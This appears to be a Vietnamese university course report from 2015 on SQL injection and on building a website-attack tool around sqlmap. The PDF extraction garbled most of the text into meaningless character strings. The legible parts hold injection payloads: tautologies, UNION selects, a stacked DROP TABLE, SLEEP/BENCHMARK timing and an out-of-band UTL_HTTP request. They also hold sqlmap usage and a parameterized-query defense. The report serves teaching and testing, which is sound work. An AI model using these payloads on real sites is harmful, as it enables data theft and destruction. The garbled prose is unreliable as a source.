20102035 - lê văn quân - báo cáo Đồ Án môn học - tấn công website bằng mysql...


  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    1/20

    TRƯỜNG ĐẠI HỌC BÁCH KHOA HÀ NỘI
    VIỆN CÔNG NGHỆ THÔNG TIN VÀ TRUYỀN THÔNG

    *

    ĐỒ ÁN MÔN HỌC
    NGÀNH CÔNG NGHỆ THÔNG TIN

    TÌM HIỂU SQL INJECTION VÀ VIẾT CÔNG CỤ TẤN CÔNG WEBSITE DỰA TRÊN SQLMAP

    Sin !i"n #$% i&n' L$ V%& Q'(&() CNTT+TT,-, . K/0

    Gi12 !i"n 3)n4 56n' T7 B)* T+,&- T)&-

    HÀ NỘI 11-2015

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    2/20

    (I N@I UT2 12 %12 %DE Fi#E# S%>i# ni# !a 2 # M7i# 9:,/N #bn4 #in

    %DE \1% en4-Nan l>n #] M7i#- Tm #3kn4 #3[n4 Q# & #Zn4 n4?nen4 ] ni^ n4 neJ E%\ % #_ e nn4 4op HE Q# & #Zn4 #"n mEX3[% Xia> \i_n cn4 M7i# e % n4 neJ i&> En nin #"n # 4i)i % X3[%X 2p

    V S=( Ind%#i2n e 4op S=( Ind%#i2n 2h# XQn4 n3 # ne2p (e # ne2X_ fn4 #1n X3[% np

    Tei i&> 7E> X? %>n4 %P %1% #bn4 #in !a X]n n4qEJ %1% 3rn4 1 #Pn%bn4 cn4 S=( Ind%#i2nJ %1% #% s? 5$n4 %bn4 %t #Pn %bn4 S=( Ind%#i2n l>E7lE AuI X_ 4iv nn4 n43wi l>n #] M7i# % #_ #$ \i_ #E & #Zn4M7i# %DE on % ] ni^ S=( Ind%#i2n \bn4 !e %1% 5!2 % #_ #1nnn4 n4 X n4E #x \i y# Xz> 1# #i_n 5$ 1n-

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    3/20

    MỤC LỤC
    CHƯƠNG I: TỔNG QUAN VỀ SQL INJECTION--------------------------------------------------

    ,-,- ]n n4qE !e Q# !ei ! 5t-------------------------------------------------------------------------,-9- C1% \ #># #Pn %bn4 S=( Ind%#i2n------------------------------------------------------------/

    ,-9-,- 22En8E75 in5---------------------------------------------------------------------------/

    ,-9-9- #i8E75 in5---------------------------------------------------------------------------------0,-9-;- 28E75-----------------------------------------------------------------------------------------0,-9-- UNION l>8E75--------------------------------------------------------------------------,-9-/- 7#E%\5 l>i7-----------------------------------------------------------------------------------,-9-0- 2>#828En5-----------------------------------------------------------------------------------------

    ,-;- C1% fn4 !&----------------------------------------------------------------------------------------------CH}NG II' Y NG CNG C| TN CNG FBSIT THNG =UAS=( INCTION------------------------------------------------------------------------------------------------------

    9-,- Gi)i #i&> S=(E-----------------------------------------------------------------------------------------9-,-,- {Q# !ei %1% 7m 5tn4 S=(E #3wn4 4---------------------------------------------9-,-9- C1% #% 7lE l># 27 !E %EM M7i#---------------------------------------

    9-9- 1% #$% #2n4 n4 5tn4 F------------------------------------------------------------------------9-9-,- ]n n4qE-----------------------------------------------------------------------------------------------9-9-9- {Q# !ei \ #># s1% #$% M7i#---------------------------------------------------------,:9-9-;- C1% 3rn4 #% s1% #$% #2n4 S=(E---------------------------------------------,:9-9-- C22\i7 !e 777i2n7-------------------------------------------------------------------------------,:

    9-;- ? 5$n4 %3rn4 #on---------------------------------------------------------------------------------,9

    9-;-,- u?n #% !e #i# \-------------------------------------------------------------------------------,99-;-;- H2en #i&n !e \i_ #m %3rn4 #on----------------------------------------------------,/9-;-- To i_> !e 72 71n E%\ 2s !e Mi# 2s-----------------------------------------,0

    TRA CỨU BẢNG BIỂU-----------------------------------------------------------------------------------------,
    TÀI LIỆU THAM KHẢO---------------------------------------------------------------------------------------,

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    4/20

    CHƯƠNG I: TỔNG QUAN VỀ SQL INJECTION

    1.1. Định nghĩa và ví dụ
    Sl Ind%#i2n e Q# n4 %2 n43wi 5>n4 % #_ %n !e #$% #i %?> &nS=( #bn4 l>E 5 i&> Xz> !e2 %DE F-

    V 5t ,' S=( Ind%#i2n 5$E !e2 ,, >bn Xvn4Ki #o \i >7J 7! % #_ 7 #$% #i X2hn 7E>'

    //Lấy UserID từ dữ liệu đầu vào

    txtUserId = getRequestString("UserId");

    //Tìm kiếm xem trong bảng Users xem có user nào có UserID = txtUserID là giá trị nhập vào
    txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

    N> #E n U7I5 Q# 7Z #o 7 \bn4 % !Pn Xa 4o s E %J n3n4 n> #E nU7 I ,:/ 2 ,, #o %?> #> !Pn 7 #en'txtS2L = !S3L34$ 5 6R78 Users 9:3R3 UserId = or \i&n ,:/ 2 ,, 7 #k #en >bn Xvn4J !o ! E%\ % #_ #% s>P# 5 i&>#x S=( 5E#EE7 Q# %1% 5^ 5en4 n> Xia> \i&n Xz> !e2 \bn4 %# %-

    V 5t 9' S=( Ind%#i2n 5$E !e2 >bn Xvn4-Ki s1% #$% #en !i"nJ 7! % #_ #$% #i X2hn 7E>'

    uName = getRequestString("UserName");
    uPass = getRequestString("UserPass");

    sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

    HE%\ % #_ \2 2 %n 2 2% En5 !e2 #2n4 #3wn4 >NE !e >uE77 n37E>'
    SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""

    C?> #> !Pn #"n 2en #2en [ &J 7 #% #2en Q %1% #3wn4 #2n4 #E U77 En42ei !o AAAA '& F&-V> ?@ 0 SQL I&K=*& ?8 9: =6K 6*& &6*' K(' &6 FP&- =6*4Hz> # %1% 5E#EE77 Xa> #[ #$% #i nia> %?> &n S=( %1% nE> ki 5P>% V 5t'S! %25't'tUser = getRequestString("User");

    txtSQL = "SELECT * FROM Users WHERE User = " + txtUser;

    Ki E%\ 5n4 in># U7I e'

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    5/20

    ,:/ ROu TAB( S>i7S! #o \i >7 % i5 e ,:/J 7E> X sE TE S>i7

    1.2. Các kỹ thuật tấn công SQL Injection
    S=( Ind%#i2n 4` 0 \ #># 7E> X?'

    1.2.1. boolean-based blind

    Gi 7m M7i# % in\ ##'MMM-sE-%2in5s-pi5,i_n #] 5 i&>N> #E #" AND1=2#en ##'MMM-sE-%2in5s-pi5,En5,9JM7i# n4xn4 i_n #] 5 i&>J 7E> X #m #E ,9 cn4 ,,J M7i# hi i_n #]5 i&>- Ki X M7i# X ] Q n4 B22En8E75 in5 S=( ind%#i2n in\5$E #"n Xvn4 7Ei

    N4>"n n?n e 52 M7i# X \bn \2 n nn4 \# l> 7Ei %v 1 2% \bn4Xvn4J #> ni"n %?> #> !Pn %DE M7i# !6n 5^ 5en4 \Ei #1%

    S(CT * RO{ >7 FHR i5i5Ki \bn4 i_n #] n3 !J #E % #_ #m cn4 %1% X21n zn 3[# #xn4 % %1i %DE#bn4 #in #E >Zn P cn4 %1% 5n4AN ASCIISUBSTRING>7nEJ,J,

    SUBSTRING (expression, start, length) dng ly ! length ! t"#$t %& t' start a &serna*e+

    S-II l. h.* h&yn ! t" / sang *0 S-II 12 tra 3& d14i 5y

    6"a 7.o 8h h9n tr:n, ta / th i* tra h; 8i %& ti:n a&serna*e / ph nhanh h/ng h?n, / th th@ 74i A

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

    http://www.example.com/index.php?id=1http://www.example.com/index.php?id=1%27and%271=2http://www.example.com/index.php?id=1http://www.example.com/index.php?id=1%27and%271=2
  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    6/20

    ?*ng @A ?*ng trB +Cu & ES4IIF dGng H ly tng tin t dBtB)Bse

    1.2.2. time-based blind
    T3rn4 #$ %1% #Pn %bn4 5$E #"n B22En8E75 in5J %g \1% %vn4 #E 7 7m 5tn4

    n> Xia> \i&n Xvn4 #o 1 %D 7 5E E2 ?> cn4 %1% 7m 5tn4BNCH{ARK/::::::JNCO{SGJ / 7%2n57

    1.2.3. error-based
    ( n4 ne 5^ nn i# !e 5^ #Pn %bn4 nP#J ! 5t #> !Pn eS(CT * RO{ U7 FHR i5i5

    N> #E #>an i5 % 4i1 #] 3XY %?> #> !Pn 7 ] 7Ei %v 1 !e i_n #] \# l> En42ei 4iE2 5i&n M-

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    7/20

    :%n JA 9e)site Bngelvestgrou1K+o& ). l Mng sql errorN)BsedKHE%\ % #_ 5^ 5en4 #% s>P# 5 i&> #2n4 5E#EE7 5$E #"n n4 ne-

    1.2.4. UNION query-basedGi 7m M7i# En4!7#42> #"n ] y% n4 UNION l>8E75JCaer / th hDo lDo h9n oEn *0 sa&F&nion all selet na*e ro* syso#Hets here xtypeJK&K

    !e2 %>Zi in\ !e % #_ P X3[% nE #2n4 n4 772d%#7 e % s#>

    1.2.5. stacked queries
    ? e %1% E%\ 5$E !e2 %?> &n \ #2n4 S=(V 5t 7l l>i7 eS(CT * RO{ U7 FHR i5i5TE % #_ %n i5 ,ROu TAB( U7J \i X #> !Pn 7 eS(CT * RO{ U7 FHR i5, ROu TAB( U7S sE n4E #E U7 7E> \i #> !Pn Xn i5,-HE%\ % #_ 5^ 5en4 #> !Pn 5 i&> Xn 5E#EE7J #E Xi #bn4 #in #"n5E#EE7 n3 >7nEJ E77M25J

    V)i i neJ E5in % #_ e 4o !)i 5E#EE7 #o E%\ %jn4 % #_ e X3[% n3!-

    1.2.6. out-of-band
    T1?ng t" stad Lerries, nh1ng l%n n.y haer / th tn =ng ddos 8e#site h8 #Mng

    ||UTL_HTTP.request('(URL)/'||(SELECT user !"# $UL&&

    344 CK6 Z6[&- 9{Q# 7Z M 5!27 7m 5tn4 %1% %n %1% #x \E #2n4 S=( In># X_ #1n ]

    #Pn %bn4 S=( Ind%#i2n- T> ni"n %1% ne 7in E nia> P# #i&n- C1% #Z# nP# e7m 5tn4 SQL #8+8;=+\4V 5t
    txtNam = getRequestString("CustomerName");

    txtAdd = getRequestString("Address");

    txtCit = getRequestString("City");

    txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";

    db.Execute(txtSQL,txtNam,txtAdd,txtCit);

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    8/20

    (&n 5-s%># 7 %n %1% EE#7 !e2 %?> &n 7l !e #1n !i&% %n nn4in># %E 1% -

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    9/20

    CHƯƠNG II: XÂY DỰNG CÔNG CỤ TẤN CÔNG WEBSITE THÔNG QUA SQL INJECTION

    R434 G*`* =6*' SQL;8ZS=(E e %bn4 %t l># n4 2 # 5E#EE7 !e #$ XQn4 l># 7l ind%#i2n-S=(E X3[% !i# cn4 #2nJ %h n X]n #"n nan #2n9-0 !e #2n9-

    2.1.1. Một vài cách sử dụng sqlmap thường gặp

    S=(E e %bn4 %t l># n4 2 # 5E#EE7 !e #$ XQn4 l># 7l ind%#i2n-S=(E X3[% !i# cn4 #2nJ %h n X]n #"n nan #2n9-0 !e #2n9-{Q# !ei %1% 5>n4 %DE 7lE 7E> X?'O#i2n8J 88 Hi_n #] 3)n4 56n

    8 Hi_n #] 3)n4 56n Xz XD88!7i2n Hi_n #] i"n n8! VRBOS Hi_n #] %i #i#TE4#85 IRCT K# nZi #$% #i Xn 5E#EE78> UR( K# nZi #)i UR(8 (OGI( u?n #% \# l> #x 24 i8 BU(KI( =># nia> t% #i"> X3[% 4i #2n4 i8 R=USTI( T$% i&n HTTu l>7# #x i84 GOOG(ORK (P \# l> #o \i #x 4224 !e l>#

    zn 3[#8% CONIGI( (P 2#i2n #x i iniInd%#i2n8 CWn EE#7887\i B l>E EE# 88E#%88%EMs

    Bn4 ' C1% 7m 5tn4 {7l Ind%#i2n

    2.1.2. Cách thức sqlmap quét forms và crawl website.

    C1% #% 7lE l># 27Ki_ #E \# nZi #)i >To \i 2

    N> \bn4 #o #P 2J \# #v% %3rn4 #onN> #o #P 2J X3E E %1% EE#7 %DE 2 XHi n43wi 5n4 % >Zn \i_ #E 2 ne \bn4 % X]n %Ki_ #E XQ n X]n %DE > 7E> \i 7n5 27#4#J > % 4i n4>"n E \bn4

    N> U \bn4 n X]nJ 7l 7 72 71n !e 5$E !e2 7$ \1% nE> %DE > # !a X_ X3E E\# l>Ki_ #E EE# #2n4 23E E \# l> %DE EE# X

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    10/20

    K# #v% EE#7K# #v% 273E E \# l>J \# #v% %3rn4 #on

    Bn4 /' C1% #% 7lE l># 2

    Ki_ #E % 7i#E E \bn4 % X]n \bn4N !e2 7Z >`n4 % X]n ,Ki_ #E > % 5i%# E \bn4J i n43wi 5n4 % >Zn #2 in\ ne E \bn4n$E !e2 XQ 5# %DE %EMJ P E 5En 71% in\ cn4 %1% P #xn4 in\ #2n4 i#En4J 3> hi in\ XJ 4mi ## l>7# !e nn ## 72n7J #i #t% P #2en Q in\#2n4 #En4 XJ % n3 ! Xn \i Xh# X3[% XQ 7?>

    N> \bn4 % in\ #o \# #v% %3rn4 #onN> % in\J %3rn4 #on 7 W% E %1% in\ % %n4 %P> #v%J ! 5t

    ##'E5-2425>%#-pi5, !e ##'E5-24>5>%#-pi59 7%g X3[% #7# , zn-3E E in\ Xz> #i"nJ i n43wi 5n4 >Zn #7# \bn4 T7# n> X3[% "> %z>( hi %2 Xn \i # #2en Q in\3E E \# l>K# #v% %3rn4 #on

    Bn4 0' C1% #% 7lE %EM M7i#

    2.2. Xác thực trong ứng dụng Web
    2.2.1. Định nghĩa
    1% #$% e Q# !i&% s1% X]n Q# >7 %n e n43wi X-Hi_> Xrn 4inJ \i #h2 , >7 e E%s !e % # \> ,9;/0- Ki s1% #$%JM7i# 7 i >7nE !e E77M25 e 4o- N43wi 5n4 7 n !e2 >7nE !e

    E77M25 X #h2 #3)% XJ !e 1 %D 7 s1% nn X? %n e >7 e X #h2>7nE E%s-{t% X% %DE !i&% s1% #$% #"nJ e #1n nn4 n43wi \1% % #_ e nn4 !i&%e 1 %D D l>an >7nE E%s e !i&%- Vo !J 1 %D 7 %Z 4yn4

    \bn4 X_ E%\ #> % X3[% >7 e \bn4 %zn # \> 2% 5^ 5en4 P X3[%# \>-

    2.2.2. Một vài kỹ thuật xác thực website
    HTTP Basic Authentication

    HTTP Digest Authentication

    HTTPS Client Authentication

    Form Based Authentication
    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

    http://myphamdep.org/product.php?id=1
    http://myphamdep.org/pruduct.php?id=2
  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    11/20

    (r)*sertru+ ,-.*e/s0te

    1e/ser2er3450 t6)sess0)7

    1e/ser2er890 ,))30e

    ,4)/r)*ser

    (r)*ser :;u,))30e

    2.2.3. Các phương thức xác thực trong sqlmap
    SlE #[ ; 3rn4 #% s1% #$% ##

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    12/20

    (r)*ser tru+ ,-.ser2er> 890 3?@ ,))30e

    Ser2er 30A@ tr< ,))30e,B t;C78 D78 2E0

    sess0)7 7F) 34G78H =Iu 34G78> 3450 t6) sess0)7

    @E0H =Iu ,B> trJ 2K ,L, 80L trM N;O,

    :;u tr)78 sess0)7 ,P

    TrJ 2K tr

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    13/20

    b) Giao diện

    Hon ' GiE2 5i&n %3rn4 #on l># n4 7l ind%#i2n

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    14/20

    c) Thiết kế chương trình

    Hon ,:' Sr X` \Zi %3rn4 #onC3rn4 #on 7 #h2 Q# 2 72M E %2 n43wi 5n4 nn4 # %Wn 7E> X?'

    1 fut te) U!L C) - ur: C) ,r E X3[% %2En5 #2 %3rn4 #on X #on 7n !e 4Wi%2En5 Xn 7lE- SlE X3[% !i# cn4 #2n !e X3[% %h #"n nan #2n!o ! #E %zn % #2n !e 7lE #"n 1- SE> \i 7lE#2n %h s2n4%3rn4 #onJ n 7 # hi \# l> %2 %3rn4 #on !e %3rn4 #on 7 72M n "n2-

    d) Sử dụng kỹ thuật xác thực http

    Cv 1 %DE 7lE !)i HTTu 2#2%2 E>#n#i%E#i2n eU7nE'E77M25V 5t #2n 7lE- 8> ##',9-,0-,;0-,;,7lE7lE7i%4#in#-pi5, 88E>#8# BE7i% 88E>#8%5 #7#>7'#7#E77

    S #Pn %bn4 httpFOPQ+O+O+OOsLl*ap*ysLl#asigetint+phpVidJO !)i

    3rn4 #% s1% #$% BE7i% !e >7nE #7#>7J # \> e #7#E77

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

    http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1
  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    15/20

    e) Sử dụng cookie jk - ] tF )J

    %znJ %Wn l>7# Xz> #i"n !e s

    %22\i %DE n-

    Hon ,,' =># cn4 %22\i X P

    CP> #v% l># cn4 %22\i %DE 7lE e%2En5 .%22\inQi 5>n4 %22\iT$% n4i&

    Hon ,9' S=(E l># \bn4 5n4 s1% #$%J M7! # !a 2 X

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    16/20

    Hon ,;' SlE l># 7m 5tn4 %22\iJ # !a #En4 l>n #]

    2.3.3. Hoàn thiện và kiểm thử chương trình
    E {bi #3wn4 e !i&% e Fin52M7 ,: 0 i# % \# nZi hn4 #)i M7i# ] #Pn%bn4-

    C>n ] nn4 %bn4 %t 7E> #3)% \i #on,- u#2n #"n Fin52M7J #i #hi ##7'MMM-#2n-249- SlEJ X3[% !i# cn4 #2nJ #i #hi' ##'7lE-24;- Vi7>E S#>5i2 5n4 X_ !i# n4 5tn4 #"n Fin52M7-

    % C1% #% %3rn4 #on 2h# XQn4

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

    https://www.python.org/
    http://sqlmap.org/
  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    17/20

    2.3.4. Tìm hiểu và so sánh black box và white box

    S2 71n BE%\ B2s Fi# B2s]n n4qE (e 3rn4 1 \i_ #E

    XQ 2 # %DE zn a

    n3 Q# Q Xn . n43wi\i_ #E \bn4 %zn i

    i# !a 2h# XQn4 "n #2n4%DE n-

    (e 3rn4 1 \i_ #EXQ 2 # %DE zn a

    cn4 %1% l># #$% #i72>% %25-

    BE%\ B2s !e Fi# B2s#2n4 F 5!2n#

    (e 3rn4 1 \i_ #EXQ 2 # M7i# cn4%1% 4mi nn ##l>7#72n7J %Z #onX3E !e2 %1% in># 1%

    nc X3E E n4 %DEM7i#-

    N42ei E E%\ 2s %fn %#_ #$% #i l># n4%DE M 7!-

    (e 3rn4 1 \i_ #E#$% #i 72>% %25J s1%X]n #> !Pn Xn 5E#EE7% 7r k E \bn4J \i_#E %1% i_n #] E n42ei %

    5^ ] %n #" 7%i# E\bn4J !!-

    > Xi_ $l cF tY, d mG ,[ It

    s)ur,e ,)ce S9 ci t)): ,B tA

    A@ tr< N;O,Ku *este mA@ tr< ] ,,

    s9 ci ,n ,,

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    18/20

    C1% #22 Fi# B2s X3[% 7m 5tn4 #3wn4 5n4 X_ l># %1% >ni# % #_ e Q# %E77JQ# i J J X3[% i_> e #en zn n nP# % #_ #7# #2n4 S2>% %25-_ l># cn4 Fi# B2sJ #7# i l>"n Xi !a u2d%# !e i #3 5> n3 Q#E%\- T2n4 %1% 5$ 1n X3[% !i# cn4 J %bn4 %t E X3[% 7m 5tn4 X_ #7# e

    >ni# X3[% #i !a #hi'##7'>ni#-5

    N42ei E %fn % >ni# %2 E!EJ N>ni# %2 2#n#--Fi#2s ni %>n4 !e >ni# ni i"n4J #3wn4 X3[% 7m 5tn4 %2 i##24Ein4 #3wn4 X3[% !i# #y# e u . e 3rn4 #% 1# #i_n zn anEn !e i&> l> nP# \i \1% en4 #E Xi "> %z>-=>1 #on 1# #i_n zn a 5$E #"n #7# #$ XQn4 !e i"n #t% 4Wi e T7# i!n!2n# T- T2n4 l>1 #on neJ #E !o %25 X3[% !i# #3)%J 5!277 !i# #7#in4 >ni# #3)% n3 Q# n #i# \ 7r \Ei %DE %3rn4 #onJ 7E> X )i!i# %25 X_ E77 %1% #7#in4 >ni# 7E>- C i zn %25 #E XiJ 5!7 % #_ 5^5en4 %h hi l>1 #on #7# !)i %1% #7# %E77 X X3[% \2 2 X3E !e2 v% #3)%J4i #wi 4iEn 1# #i_n zn a cn4 %1% >bn \i_ #E X3[% i-Zi !)i 2 # M7i# ni %>n4 !e 7l ind%#i2n ni i"n4J 5! % #_ %D XQn4X3E !e2 %1% in># 1% !e X]n n4qE # ne2 e En #2en %2 #7#in4 >ni# nc \i_#E n4 2 # #$ XQn4 !e % #_ l># i"n #t% #2n4 l>1 #on 5!-

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,

    https://phpunit.de/
  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    19/20

    TRA CỨU BẢNG BIỂU
    Bi_> X` ,' TZn4 \" %DE Fi#E# 7%>i# !a 2 # M7i# 9:,/--------------;Bn4 9' Bn4 #E %> ASCIIJ 5n4 X_ P #bn4 #in #x 5E#EE7-0Hon ;' F7i# En4!7#42>-%2 ] n4 7l 28E75---Bn4 ' C1% 7m 5tn4 {7l Ind%#i2n--

    Bn4 /' C1% #% 7lE l># 2Bn4 0' C1% #% 7lE %EM M7i#------Hon ' GiE2 #i 4iE 7! !e %in# \i %3E % %22\i !e 777i2n-,,Hon ' GiE2 #i 4iE 7! !e %in# \i X % %22\i !e 777i2n-,,Hon ' GiE2 5i&n %3rn4 #on l># n4 7l ind%#i2n---,9Hon ,:' Sr X` \Zi %3rn4 #on----,;Hon ,,' =># cn4 %22\i X P-----,Hon ,9' S=(E l># \bn4 5n4 s1% #$%J M7! # !a 2 X

  • 7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

    20/20

    TÀI LIỆU THAM KHẢO

    ,- S=(E >77 En>E' ##7'4i#>-%27lE2d%#7lEMi\i

    9- RC90,0' ##'MMM-M;-24u2#2%27%90,0%90,0-#

    ;- S=( Ind%#i2n M;7%227-%2'##'MMM-M;7%227-%27l7lind%#i2n-E7

    - S=( Ind%#i2n 2ME7-24' ##7'MMM-2ME7-24in5s-S=(Ind%#i2n

    /- O># 2 En5 ##7'MMM-E%>n#is-%224E#i%7in582>#828En587l8ind%#i2n8!>nEii#8#7#in48E5558E%>2ni#2

    0- B22En8E75##'7%>i#-7#E%\s%En4-%2l>7#i2n70,0:0>n57#En5in4822En8

    E7587l8ind%#i2n

    - Ti8E75 ##'MMM-7lind%#i2n-n##i8E75

    - 28E75 ##'MMM-7lind%#i2nMi\i-%2CE#42i797l87l8ind%#i2n8%E#87#

    - UNION l>8E75 ##'MMM-#2>n#-%29:,;:!#in482>8MEn#58#28\n2M8E2>#87l-#

    ,:-S#E%\5 =>i7 ##'MMM-M;7%227-%27l7lind%#i2n-E7

    ,,- F Ai%E#i2n S%Enn7 BE%\ B2s !7- Fi# B2s##7'MMM-2ME7-24iE470OFASuI(9::SEEEniBE%\B2sV7Fi#B2s-#

    ,9- F Ai%E#i2n S%>i#J #1% 4i TS- T]n T>Pn h#

    ,;-##'72i%#->7#-5>-!n5E###MdE!EBEi,FAS%>i#S%-5

    ,-S77i2n !e %22\i' ##'M;7%227-%2

    Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,